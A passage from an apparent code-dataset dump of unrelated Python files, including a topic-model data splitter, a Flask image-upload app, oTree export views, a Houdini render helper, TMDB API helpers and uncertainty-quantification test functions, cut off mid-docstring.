enumerate(vocab)])\nid2word = dict([(j, w) for j, w in enumerate(vocab)])\nprint('vocabulary after removing words not in train: {}'.format(len(vocab)))\n\n# Split in train/test/valid\ndocs_tr = [[word2id[w] for w in init_docs[idx_permute[idx_d]].split() if w in word2id] for idx_d in range(trSize)]\ndocs_ts = [[word2id[w] for w in init_docs[idx_d+num_docs_tr].split() if w in word2id] for idx_d in range(tsSize)]\n\n# Remove empty documents\nprint('removing empty documents...')\n\ndef remove_empty(in_docs):\n return [doc for doc in in_docs if doc!=[]]\n\ndocs_tr = remove_empty(docs_tr)\ndocs_ts = remove_empty(docs_ts)\n\n# Remove test documents with length=1\ndocs_ts = [doc for doc in docs_ts if len(doc)>1]\n\n# Split test set in 2 halves\nprint('splitting test and validation documents in 2 halves...')\ndocs_ts_h1 = [[w for i,w in enumerate(doc) if i<=len(doc)/2.0-1] for doc in docs_ts]\ndocs_ts_h2 = [[w for i,w in enumerate(doc) if i>len(doc)/2.0-1] for doc in docs_ts]\n\n# Get doc indices\nprint('getting doc indices...')\n\ndef create_doc_indices(in_docs):\n aux = [[j for i in range(len(doc))] for j, doc in enumerate(in_docs)]\n return [int(x) for y in aux for x in y]\n\ndoc_indices_tr = create_doc_indices(docs_tr)\ndoc_indices_ts_h1 = create_doc_indices(docs_ts_h1)\ndoc_indices_ts_h2 = create_doc_indices(docs_ts_h2)\n\n# Number of documents in each set\nn_docs_ts_h1 = len(docs_ts_h1)\nn_docs_ts_h2 = len(docs_ts_h2)\n\n# Create bow representation\nprint('creating bow representation...')\n\ndef create_list_words(in_docs):\n return [x for y in in_docs for x in y]\n\ndef create_bow(doc_indices, words, n_docs, vocab_size):\n return sparse.coo_matrix(([1]*len(doc_indices),(doc_indices, words)), shape=(n_docs, vocab_size)).tocsr()\n\nbow_ts_h1 = create_bow(doc_indices_ts_h1, create_list_words(docs_ts_h1), n_docs_ts_h1, len(vocab))\nbow_ts_h2 = create_bow(doc_indices_ts_h2, create_list_words(docs_ts_h2), n_docs_ts_h2, len(vocab))\n\n# Remove unused variables\ndel docs_ts_h1\ndel docs_ts_h2\ndel doc_indices_ts_h1\ndel doc_indices_ts_h2\n\n# Write the vocabulary to a file\nif not os.path.isdir(args.data_path):\n os.system('mkdir -p ' + args.data_path)\n\nwith open(args.data_path + 'vocab.pkl', 'wb') as f:\n pickle.dump(vocab, f)\n\ndef save_data(x, mode, path_save):\n \n x = x.toarray()\n docs = []\n for d in x:\n\n doc = []\n for index in list(d.nonzero()[0]):\n doc += d[index] * [index]\n\n docs.append(np.array(doc))\n\n docs = np.array(docs)\n np.save(os.path.join(path_save, mode + '.txt.npy'), docs)\n\n# Split bow intro token/value pairs\nprint('splitting bow intro token/value pairs and saving to disk...')\n\ndef split_bow(bow_in, n_docs):\n indices = [[w for w in bow_in[doc,:].indices] for doc in range(n_docs)]\n counts = [[c for c in bow_in[doc,:].data] for doc in range(n_docs)]\n return indices, counts\n\nkf = KFold(n_splits=args.folds)\n\nfor fold, indices in enumerate(kf.split(docs_tr)):\n\n print(\"Creating fold: \", fold) \n fold_path = args.data_path + 'fold' + str(fold) + '/'\n if not os.path.isdir(fold_path):\n os.system('mkdir -p ' + fold_path)\n\n train, valid = [docs_tr[i] for i in indices[0]], [docs_tr[i] for i in indices[1]]\n print('number of documents (train): {}'.format(len(train)))\n\n train_indices = create_doc_indices(train)\n bow_tr = create_bow(train_indices, create_list_words(train), len(train), len(vocab)) \n save_data(bow_tr, 'train', fold_path)\n\n pre_valid_h1 = [[w for i,w in enumerate(doc) if i<=len(doc)//2] for doc in valid]\n pre_valid_h2 = [[w for i,w in enumerate(doc) if i>len(doc)//2] for doc in valid]\n\n valid_h1 = []\n valid_h2 = []\n \n for x, y in zip(pre_valid_h1, pre_valid_h2):\n if len(x) != 0 and len(y) != 0:\n valid_h1.append(x)\n valid_h2.append(y)\n\n print('number of documents (valid): {}'.format(len(valid_h1)))\n valid_h1_indices = create_doc_indices(valid_h1)\n bow_va_h1 = create_bow(valid_h1_indices, create_list_words(valid_h1), len(valid_h1), len(vocab))\n save_data(bow_va_h1, 'valid_h1', fold_path)\n\n valid_h2_indices = create_doc_indices(valid_h2)\n bow_va_h2 = create_bow(valid_h2_indices, create_list_words(valid_h2), len(valid_h2), len(vocab))\n save_data(bow_va_h2, 'valid_h2', fold_path)\n \n del train\n del train_indices\n del bow_tr\n del valid_h1\n del valid_h1_indices\n del bow_va_h1\n del valid_h2\n del valid_h2_indices\n del bow_va_h2\n\nsave_data(bow_ts_h1, 'test_h1', args.data_path)\nsave_data(bow_ts_h2, 'test_h2', args.data_path)\nprint('Data ready !!')\n","sub_path":"scripts/data_nips_cv.py","file_name":"data_nips_cv.py","file_ext":"py","file_size_in_byte":7635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"284829734","text":"import csv\n\nfiles = range(1,13)\n\nfor f in files:\n\tpath = '../data/2008/2008-%s.csv' % f\n\tf = open(path, 'rb')\n\tdata = csv.DictReader(f)\n\n\tdictFile = open('../data/cleanedData/2008LatLng.json', 'ab')\n\tfor d in data:\n\t\tif 'PHOENIX, AZ' in d['Address']:\n\t\t\tnewLine = str(d)\n\t\t\tnewLine += '\\n'\n\t\t\tdictFile.write(newLine)","sub_path":"tools/2008CleanCsv.py","file_name":"2008CleanCsv.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"522856496","text":"# Copyright 2014 Huawei Technologies Co. Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Adapter related database operations.\"\"\"\nimport logging\nimport re\n\nfrom compass.db.api import database\nfrom compass.db.api import utils\nfrom compass.db import exception\nfrom compass.db import models\n\nfrom compass.utils import setting_wrapper as setting\nfrom compass.utils import util\n\n\nOSES = None\nOS_INSTALLERS = None\nPACKAGE_INSTALLERS = None\nADAPTERS = None\nADAPTERS_FLAVORS = None\nADAPTERS_ROLES = None\n\n\ndef _get_oses_from_configuration():\n \"\"\"Get all os configs from os configuration dir.\n\n Example: {\n : {\n 'name': ,\n 'id': ,\n 'os_id': ,\n 'deployable': True\n }\n }\n \"\"\"\n configs = util.load_configs(setting.OS_DIR)\n systems = {}\n for config in configs:\n logging.info('get config %s', config)\n system_name = config['NAME']\n parent_name = config.get('PARENT', None)\n system = {\n 'name': system_name,\n 'id': system_name,\n 'os_id': system_name,\n 'parent': parent_name,\n 'parent_id': parent_name,\n 'deployable': config.get('DEPLOYABLE', False)\n }\n systems[system_name] = system\n parents = {}\n for name, system in systems.items():\n parent = system.get('parent', None)\n parents[name] = parent\n for name, system in systems.items():\n util.recursive_merge_dict(name, systems, parents)\n return systems\n\n\ndef _get_installers_from_configuration(configs):\n \"\"\"Get installers from configurations.\n\n Example: {\n : {\n 'alias': ,\n 'id': ,\n 'name': ,\n 'settings': \n }\n }\n \"\"\"\n installers = {}\n for config in configs:\n name = config['NAME']\n instance_name = config.get('INSTANCE_NAME', name)\n installers[instance_name] = {\n 'alias': instance_name,\n 'id': instance_name,\n 'name': name,\n 'settings': config.get('SETTINGS', {})\n }\n return installers\n\n\ndef _get_os_installers_from_configuration():\n \"\"\"Get os installers from os installer config dir.\"\"\"\n configs = util.load_configs(setting.OS_INSTALLER_DIR)\n return _get_installers_from_configuration(configs)\n\n\ndef _get_package_installers_from_configuration():\n \"\"\"Get package installers from package installer config dir.\"\"\"\n configs = util.load_configs(setting.PACKAGE_INSTALLER_DIR)\n return _get_installers_from_configuration(configs)\n\n\ndef _get_adapters_from_configuration():\n \"\"\"Get adapters from adapter config dir.\"\"\"\n configs = util.load_configs(setting.ADAPTER_DIR)\n adapters = {}\n for config in configs:\n logging.info('add config %s to adapter', config)\n if 'OS_INSTALLER' in config:\n os_installer = OS_INSTALLERS[config['OS_INSTALLER']]\n else:\n os_installer = None\n\n if 'PACKAGE_INSTALLER' in config:\n package_installer = PACKAGE_INSTALLERS[\n config['PACKAGE_INSTALLER']\n ]\n else:\n package_installer = None\n\n adapter_name = config['NAME']\n parent_name = config.get('PARENT', None)\n adapter = {\n 'name': adapter_name,\n 'id': adapter_name,\n 'parent': parent_name,\n 'parent_id': parent_name,\n 'display_name': config.get('DISPLAY_NAME', adapter_name),\n 'os_installer': os_installer,\n 'package_installer': package_installer,\n 'deployable': config.get('DEPLOYABLE', False),\n 'health_check_cmd': config.get('HEALTH_CHECK_COMMAND', None),\n 'supported_oses': [],\n 'roles': [],\n 'flavors': []\n }\n supported_os_patterns = [\n re.compile(supported_os_pattern)\n for supported_os_pattern in config.get('SUPPORTED_OS_PATTERNS', [])\n ]\n for os_name, os in OSES.items():\n if not os.get('deployable', False):\n continue\n for supported_os_pattern in supported_os_patterns:\n if supported_os_pattern.match(os_name):\n adapter['supported_oses'].append(os)\n break\n adapters[adapter_name] = adapter\n\n parents = {}\n for name, adapter in adapters.items():\n parent = adapter.get('parent', None)\n parents[name] = parent\n for name, adapter in adapters.items():\n util.recursive_merge_dict(name, adapters, parents)\n return adapters\n\n\ndef _add_roles_from_configuration():\n \"\"\"Get roles from roles config dir and update to adapters.\"\"\"\n configs = util.load_configs(setting.ADAPTER_ROLE_DIR)\n for config in configs:\n logging.info(\n 'add config %s to role', config\n )\n adapter_name = config['ADAPTER_NAME']\n adapter = ADAPTERS[adapter_name]\n adapter_roles = ADAPTERS_ROLES.setdefault(adapter_name, {})\n for role_dict in config['ROLES']:\n role_name = role_dict['role']\n display_name = role_dict.get('display_name', role_name)\n adapter_roles[role_name] = {\n 'name': role_name,\n 'id': '%s:%s' % (adapter_name, role_name),\n 'adapter_id': adapter_name,\n 'adapter_name': adapter_name,\n 'display_name': display_name,\n 'description': role_dict.get('description', display_name),\n 'optional': role_dict.get('optional', False)\n }\n parents = {}\n for name, adapter in ADAPTERS.items():\n parent = adapter.get('parent', None)\n parents[name] = parent\n for adapter_name, adapter_roles in ADAPTERS_ROLES.items():\n util.recursive_merge_dict(adapter_name, ADAPTERS_ROLES, parents)\n for adapter_name, adapter_roles in ADAPTERS_ROLES.items():\n adapter = ADAPTERS[adapter_name]\n adapter['roles'] = adapter_roles.values()\n\n\ndef _add_flavors_from_configuration():\n \"\"\"Get flavors from flavor config dir and update to adapters.\"\"\"\n configs = util.load_configs(setting.ADAPTER_FLAVOR_DIR)\n for config in configs:\n logging.info('add config %s to flavor', config)\n adapter_name = config['ADAPTER_NAME']\n adapter = ADAPTERS[adapter_name]\n adapter_flavors = ADAPTERS_FLAVORS.setdefault(adapter_name, {})\n adapter_roles = ADAPTERS_ROLES[adapter_name]\n for flavor_dict in config['FLAVORS']:\n flavor_name = flavor_dict['flavor']\n flavor_id = '%s:%s' % (adapter_name, flavor_name)\n flavor = {\n 'name': flavor_name,\n 'id': flavor_id,\n 'adapter_id': adapter_name,\n 'adapter_name': adapter_name,\n 'display_name': flavor_dict.get('display_name', flavor_name),\n 'template': flavor_dict.get('template', None)\n }\n flavor_roles = flavor_dict.get('roles', [])\n roles_in_flavor = []\n for flavor_role in flavor_roles:\n if isinstance(flavor_role, basestring):\n role_name = flavor_role\n role_in_flavor = {\n 'name': role_name,\n 'flavor_id': flavor_id\n }\n else:\n role_in_flavor = flavor_role\n role_in_flavor['flavor_id'] = flavor_id\n if 'role' in role_in_flavor:\n role_in_flavor['name'] = role_in_flavor['role']\n del role_in_flavor['role']\n role_name = role_in_flavor['name']\n role = adapter_roles[role_name]\n util.merge_dict(role_in_flavor, role, override=False)\n roles_in_flavor.append(role_in_flavor)\n flavor['roles'] = roles_in_flavor\n adapter_flavors[flavor_name] = flavor\n parents = {}\n for name, adapter in ADAPTERS.items():\n parent = adapter.get('parent', None)\n parents[name] = parent\n for adapter_name, adapter_roles in ADAPTERS_FLAVORS.items():\n util.recursive_merge_dict(adapter_name, ADAPTERS_FLAVORS, parents)\n for adapter_name, adapter_flavors in ADAPTERS_FLAVORS.items():\n adapter = ADAPTERS[adapter_name]\n adapter['flavors'] = adapter_flavors.values()\n\n\ndef load_adapters_internal(force_reload=False):\n \"\"\"Load adapter related configurations into memory.\n\n If force_reload, reload all configurations even it is loaded already.\n \"\"\"\n global OSES\n if force_reload or OSES is None:\n OSES = _get_oses_from_configuration()\n global OS_INSTALLERS\n if force_reload or OS_INSTALLERS is None:\n OS_INSTALLERS = _get_os_installers_from_configuration()\n global PACKAGE_INSTALLERS\n if force_reload or PACKAGE_INSTALLERS is None:\n PACKAGE_INSTALLERS = _get_package_installers_from_configuration()\n global ADAPTERS\n if force_reload or ADAPTERS is None:\n ADAPTERS = _get_adapters_from_configuration()\n global ADAPTERS_ROLES\n if force_reload or ADAPTERS_ROLES is None:\n ADAPTERS_ROLES = {}\n _add_roles_from_configuration()\n global ADAPTERS_FLAVORS\n if force_reload or ADAPTERS_FLAVORS is None:\n ADAPTERS_FLAVORS = {}\n _add_flavors_from_configuration()\n\n\ndef get_adapters_internal(force_reload=False):\n \"\"\"Get all deployable adapters.\"\"\"\n load_adapters_internal(force_reload=force_reload)\n adapter_mapping = {}\n for adapter_name, adapter in ADAPTERS.items():\n if adapter.get('deployable'):\n # TODO(xicheng): adapter should be filtered before\n # return to caller.\n adapter_mapping[adapter_name] = adapter\n else:\n logging.info(\n 'ignore adapter %s since it is not deployable',\n adapter_name\n )\n return adapter_mapping\n\n\ndef get_flavors_internal(force_reload=False):\n \"\"\"Get all deployable flavors.\"\"\"\n load_adapters_internal(force_reload=force_reload)\n adapter_flavor_mapping = {}\n for adapter_name, adapter_flavors in ADAPTERS_FLAVORS.items():\n adapter = ADAPTERS.get(adapter_name, {})\n for flavor_name, flavor in adapter_flavors.items():\n if adapter.get('deployable'):\n # TODO(xicheng): flavor dict should be filtered before\n # return to caller.\n adapter_flavor_mapping.setdefault(\n adapter_name, {}\n )[flavor_name] = flavor\n else:\n logging.info(\n 'ignore adapter %s since it is not deployable',\n adapter_name\n )\n\n return adapter_flavor_mapping\n","sub_path":"compass/db/api/adapter.py","file_name":"adapter.py","file_ext":"py","file_size_in_byte":11409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"326566230","text":"from flask import Flask, redirect, url_for, render_template, request, flash, make_response\nimport Drive\nimport os\nfrom werkzeug.utils import secure_filename\n\napp = Flask(__name__)\napp.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024\npath = os.getcwd()\napp.config['UPLOAD_FOLDER'] = path\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])\n\ndef allowed_file(filename):\n return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\ndef filters(data:list, email:str):\n data.pop(0)\n maindt = []\n post = []\n position = 0\n for dt in data:\n if dt[4] == email and not \"imgur.com\" in dt[13] and not 'deals4free.in' in dt[13]:\n maindt.append(dt)\n post.append(f\"{position}\") # here inside the post its sno and position\n position = position + 1\n return maindt, post\n\n@app.route(\"/\")\ndef indexpage():\n return render_template('index.html')\n\n@app.route(\"/uploadimg\", methods=[\"POST\"])\ndef uploadimg():\n if 'files[]' not in request.files:\n flash('No file part')\n return redirect(request.url)\n ids = request.args.get(\"id\")\n files = request.files.getlist('files[]')\n n = 0\n linkList = []\n for file in files:\n if n > 10:\n break\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n link = Drive.uploadFile(filename)\n if link:\n linkList.append(Drive.uploadFile(filename))\n n = n + 1\n else:\n flash(\"This type of file is not supported or file not found\")\n if len(link):\n pass\n else:\n flash(\"Error while updating data please contact site owner\")\n cookies = request.cookies.get(\"mail\")\n Drive.updateseq(cookies, linkList, ids)\n return redirect(f'/submitDT?mail={cookies.split(\":\")[0]}')\n\n@app.route(\"/submitDT\")\ndef submitDT():\n mail = request.args.get('mail')\n allData = Drive.getDetails()\n reldt, position = filters(allData, mail)\n # 17, 20, 23, 26, 29, 32, 35, 38, 41, 44\n resp = make_response(render_template('showdata.html', data=reldt))\n resp.set_cookie('mail', f\"{mail}:{position}\") # here i am storing email and position which is post inside which its there is sno. and position of the mail\n # now here i am going to check mail and sno. to get the proper data and change its screenshots link\n return resp\n\n@app.route(\"/index.html\")\ndef indexpg():\n return render_template('index.html')\n\nif __name__ == '__main__':\n app.run(debug=True, threaded=True, port=8080)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"545342467","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\n# =============================================================================\n# IMPORTS\n# =============================================================================\n\nimport datetime\n\nfrom django.http import HttpResponse\nfrom django.conf import settings\n\nimport vanilla\n\nimport otree.common_internal\nimport otree.models\nfrom otree.common_internal import app_name_format\n\n\n# =============================================================================\n# VIEWS\n# =============================================================================\n\nclass ExportIndex(vanilla.TemplateView):\n\n template_name = 'otree/export/index.html'\n\n url_pattern = r\"^export/$\"\n\n def get_context_data(self, **kwargs):\n context = super(ExportIndex, self).get_context_data(**kwargs)\n app_labels = settings.INSTALLED_OTREE_APPS\n app_labels_with_data = []\n for app_label in app_labels:\n model_module = otree.common_internal.get_models_module(app_label)\n if model_module.Player.objects.exists():\n app_labels_with_data.append(app_label)\n apps = [\n {\"name\": app_name_format(app_label), \"label\": app_label}\n for app_label in app_labels_with_data\n ]\n context.update({'apps': apps})\n return context\n\n\nclass ExportAppDocs(vanilla.View):\n\n url_pattern = r\"^ExportAppDocs/(?P[\\w.]+)/$\"\n\n def _doc_file_name(self, app_label):\n return '{} - documentation ({}).txt'.format(\n otree.common_internal.app_name_format(app_label),\n datetime.date.today().isoformat()\n )\n\n def get(self, request, *args, **kwargs):\n app_label = kwargs['app_label']\n response = HttpResponse(content_type='text/plain')\n response['Content-Disposition'] = 'attachment; filename=\"{}\"'.format(\n self._doc_file_name(app_label)\n )\n otree.common_internal.export_docs(response, app_label)\n return response\n\n\nclass ExportCsv(vanilla.View):\n\n url_pattern = r\"^ExportCsv/(?P[\\w.]+)/$\"\n\n def _data_file_name(self, app_label):\n return '{} (accessed {}).csv'.format(\n otree.common_internal.app_name_format(app_label),\n datetime.date.today().isoformat(),\n )\n\n def get(self, request, *args, **kwargs):\n app_label = kwargs['app_label']\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename=\"{}\"'.format(\n self._data_file_name(app_label)\n )\n otree.common_internal.export_data(response, app_label)\n return response\n\n\nclass ExportTimeSpent(vanilla.View):\n\n url_pattern = r\"^ExportTimeSpent/$\"\n\n def get(self, request, *args, **kwargs):\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename=\"{}\"'.format(\n 'TimeSpent (accessed {}).csv'.format(\n datetime.date.today().isoformat()\n )\n )\n otree.common_internal.export_time_spent(response)\n return response\n","sub_path":"otree-core-master/otree/views/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":3143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"525770846","text":"#!/usr/bin/python3\n\ndef main():\n\n o_list = [1,2,3,4,5,6]\n\n c_list = [x*x for x in o_list]\n print(\"comprehension list : \",c_list)\n \n c_list = [x for x in o_list if x%2==0]\n print(\"comprehension list with condition(if x%2==0) : \",c_list)\n \n c_list = [x*10 if x<=3 else x*100 for x in o_list]\n print(\"comprehension list with ternary operator(x*10 if x<=3 else x*100) : \",c_list)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"pythonic/comprehension/comprehension_condition.py","file_name":"comprehension_condition.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"334702227","text":"from setuptools import setup, find_packages\n\nwith open(\"README.md\", \"r\") as readme_file:\n readme = readme_file.read()\n\nrequirements = [\"pandas\", \"visdom\", \"torch\", \"torchvision\"]\n\nsetup(\n name=\"AtlasNet\",\n version=\"0.1\",\n long_description=readme,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/ThibaultGROUEIX/AtlasNet\",\n packages=['AtlasNet'],\n install_requires=requirements,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"411662988","text":"import mammo_dataset\nimport json\n\n\ninbreast_dir = '/Users/lpires/Developer/dl/INbreast'\noutput_dir = './out'\n\nmds = mammo_dataset.INbreastDataset(inbreast_dir, output_dir)\nmds.read_dicoms()\nmds.read_cases(pathology_filter=[])\n\n# print(mds.cases_df.groupby(['view', 'width', 'height']).size())\n# print()\n\nmds.process_annotations(gen_calc=True,\n gen_mass=True,\n gen_asymmetry=True,\n gen_distortion=True,\n gen_spiculated=True,\n bbox_area_filter=(0))\n\nprint('annotations:', len(mds.annotations_df))\nprint('images:', len(mds.annotations_df.dicom_fn.unique()))\nprint(mds.annotations_df.groupby('category').size())\nprint()\n\nall_images = False\nconvert_dicoms = False\n\nmds.save(all_images=all_images, convert_dicoms=convert_dicoms)\n\n# mds.convert_dicoms()\n\n# mds.prepare_dataset(all_images=all_images)\n# mds.draw_annotations()\n","sub_path":"convert_inbreast.py","file_name":"convert_inbreast.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"198040481","text":"import hou\nimport subprocess\nimport platform\n\ndef getRenderNodes(node):\n \"\"\"\n returns renderable nodes found in children of specified node\n \"\"\"\n render_nodes = (\"rop_geometry\", \"geometry\", \"Redshift_ROP\", \"ifd\", \"arnold\", \"opengl\", \"baketexture::3.0\", \"rib\", \"ris\", \"ribarchive\", \"wren\", \"ifdarchive\", \"render\", \"rop_alembic\", \"brickmap\", \"merge\", \"channel\", \"comp\", \"dsmmerge\", \"fetch\", \"wedge\", \"shell\", \"null\", \"dop\", \"alembic\", \"filmboxfbx\", \"agent\", \"mdd\")\n\n node_type_name = node.type().name()\n node_children = node.allSubChildren()\n\n node_list = []\n\n if node_type_name in render_nodes:\n node_list.append(node)\n return node_list\n elif len(node_children) > 0:\n for n in node_children:\n if n.type().name() in render_nodes:\n node_list.append(n)\n else:\n print(\"No render node was found.\\n\")\n return None\n\n return node_list\n\ndef bg_render(kwargs):\n \"\"\"\n starts a separate houdini process rendering selected node, if multiple nodes were found, then asks user to choose one\n \"\"\"\n nodes = hou.selectedNodes()\n\n if not bool( nodes ):\n print(\"No nodes selected.\\n\")\n return\n\n file_path = hou.hipFile.path()\n file_name = hou.hipFile.basename()\n\n for node in nodes:\n top_node = node\n\n node_list = getRenderNodes(node)\n if len(node_list) == 0:\n return\n elif len(node_list) == 1:\n node = node_list[0]\n else:\n node_names = [n.name() for n in node_list]\n selected = hou.ui.selectFromList(choices=node_names, message=\"Multiple ROPs found, choose one to be rendered\", title=\"Choose ROP\")\n if len(selected) == 0:\n print(\"No ROP was selected.\")\n return\n else:\n node = node_list[ selected[0] ]\n\n rop_path = node.path()\n top_node_path = top_node.path()\n\n frame_by_frame = \"\"\n if kwargs[\"altclick\"]:\n frame_by_frame = \"I\"\n\n hscript_cmd = \"render -Va{0} {1}; quit\".format(frame_by_frame, rop_path)\n intro = \"Rendering {0} in {1}\".format(top_node_path, file_name)\n finish = \"Rendering was finished, press [enter] to close terminal.\"\n\n bash_render_cmd = 'hbatch -c \\\\\"{0}\\\\\" {1}'.format(hscript_cmd, file_path)\n \n if platform.system() == \"Linux\":\n p = subprocess.Popen([\"x-terminal-emulator\", \"-t\", intro, \"-e\", 'bash -c \"printf \\\\\"{0}\\\\\" && {1} && printf \\\\\"{2}\\\\\" && read\"'.format(intro + \"\\\\n\\\\n\\\\n\", bash_render_cmd, \"\\\\n\\\\n\" + finish) ], stdout=subprocess.PIPE)\n elif platform.system() == \"Windows\":\n p = subprocess.Popen('start cmd /c \"title {0} &&^echo {0} &&^echo. &&^echo. &&^{1} &&^pause \"'.format(intro, bash_render_cmd.replace(\"\\\\\",\"\")), stdout=subprocess.PIPE, shell=True)\n","sub_path":"scripts/python/bg_render.py","file_name":"bg_render.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"320438501","text":"import urllib.request\nimport urllib.parse\nimport urllib.error\nimport json\n\ndef make_tmdb_api_request(method, api_key, extra_params=None):\n extra_params = extra_params or {}\n url = 'https://api.themoviedb.org/3%s' % method\n params = {\n 'api_key': api_key,\n 'language': 'ru',\n }\n params.update(extra_params)\n return load_json_data_from_url(url, params)\n\ndef load_json_data_from_url(base_url, url_params):\n url = '%s?%s' % (base_url, urllib.parse.urlencode(url_params))\n response = urllib.request.urlopen(url).read().decode('utf-8')\n return json.loads(response)\n\ndef get_user_api_key():\n user_api_key = input('Enter your api key v3:')\n try:\n make_tmdb_api_request(method='/movie/2', api_key = user_api_key)\n return user_api_key\n except urllib.error.HTTPError as err:\n if err.code == 401:\n return None\n else:\n raise\n\n","sub_path":"tmdb_helpers.py","file_name":"tmdb_helpers.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"632510877","text":"#5.2 Write a program that repeatedly prompts a user for integer numbers\n#until the user enters 'done'. Once 'done' is entered, print out the largest\n#and smallest of the numbers. If the user enters anything other than a valid\n#number catch it with a try/except and put out an appropriate message and\n#ignore the number. Enter 7, 2, bob, 10, and 4 and match the output below.\n\nlargest = None\nsmallest = None\n\nwhile True:\n user_input = input('Enter an integer: ')\n\n if user_input.lower() == 'done':\n break\n try:\n user_number = int(user_input)\n except:\n print('Invalid input')\n continue\n if largest == None:\n largest = user_number\n elif user_number > largest:\n largest = user_number\n if smallest == None:\n smallest = user_number\n elif user_number < smallest:\n smallest = user_number\nprint(\"Maximum is\",largest)\nprint(\"Minimum is\",smallest)\n","sub_path":"Course 1 Python/ex_05_02.py","file_name":"ex_05_02.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"104400170","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.PostListView.as_view(), name='post-list'),\n path('/', views.PostDetailView.as_view(), name='post-detail'),\n path('create_post/', views.PostCreateView.as_view(), name='create-post')\n]\n\napp_name = 'blog'\n","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"10343942","text":"import pycom\nimport time\n\ndef long_t(color):\n pycom.rgbled(color) # red\n time.sleep(3)\n pycom.rgbled(0) # off\n time.sleep(1)\n\ndef short_t(color):\n pycom.rgbled(color) # red\n time.sleep(1)\n pycom.rgbled(0) # off\n time.sleep(1)\n\ncolors = [0x7f0000,0x007f00]\n\nfor cols in colors: # stop after 10 cycles\n for i in range(3):\n long_t(cols)\n for i in range(3):\n short_t(cols)\n for i in range(3):\n long_tcols()\n","sub_path":"labs/LED/SOS.py","file_name":"SOS.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"5164024","text":"\"\"\"Test capabilities for uncertainty quantification.\n\nThis module contains a host of test models and functions often used in the uncertainty\nquantification literate.\n\n\"\"\"\nimport numpy as np\nimport math\n\n\ndef borehole(x):\n r\"\"\"Borehole function.\n\n The Borehole function models water flow through a borehole. Its simplicity and quick\n evaluation makes it a commonly used function for testing a wide variety of methods in\n computer experiments.\n \"\"\"\n assert len(x) == 8\n\n r_w = x[0]\n r = x[1]\n T_u = x[2]\n H_u = x[3]\n T_l = x[4]\n H_l = x[5]\n L = x[6]\n K_w = x[7]\n\n a = 2 * math.pi * T_u * (H_u - H_l)\n b = np.log(r / r_w)\n c = (2 * L * T_u) / (b * r_w ** 2 * K_w)\n d = T_u / T_l\n\n rslt = a / (b * (1 + c + d))\n return rslt\n\n\ndef ishigami(x, a=7, b=0.1):\n r\"\"\"Ishigami function.\n\n The Ishigami function of Ishigami & Homma (1990) is used as an example for uncertainty and\n sensitivity analysis methods, because it exhibits strong nonlinearity and nonmonotonicity.\n \"\"\"\n assert len(x) == 3\n\n rslt = (1 + b * x[2] ** 4) * np.sin(x[0]) + a * np.sin(x[1]) ** 2\n return rslt\n\n\ndef eoq_model(x, r=0.1):\n r\"\"\"Economic order quantity model.\n\n This function computes the optimal economic order quantity (EOQ) based on the model presented in\n [H1990]_. The EOQ minimizes the holding costs as well as ordering costs. The core parameters of\n the model are the units per months `x[0]`, the unit price of items in stock `x[1]`,\n and the setup costs of an order `x[2]`. The annual interest rate `r` is treated as an\n additional parameter.\n\n Parameters\n ----------\n x : array_like\n Core parameters of the model\n\n r : float, optional\n Annual interest rate\n\n Returns\n -------\n\n float\n Optimal order quantity\n\n Notes\n -----\n\n A historical perspective on the model is provided by [E1990]_. A brief description with the core\n equations is available in [W2020]_.\n\n References\n ----------\n\n .. [H1990] Harris, F. W. (1990).\n How many parts to make at once.\n Operations Research, 38(6), 947–950.\n\n .. [E1990] Erlenkotter, D. (1990).\n Ford Whitman Harris and the 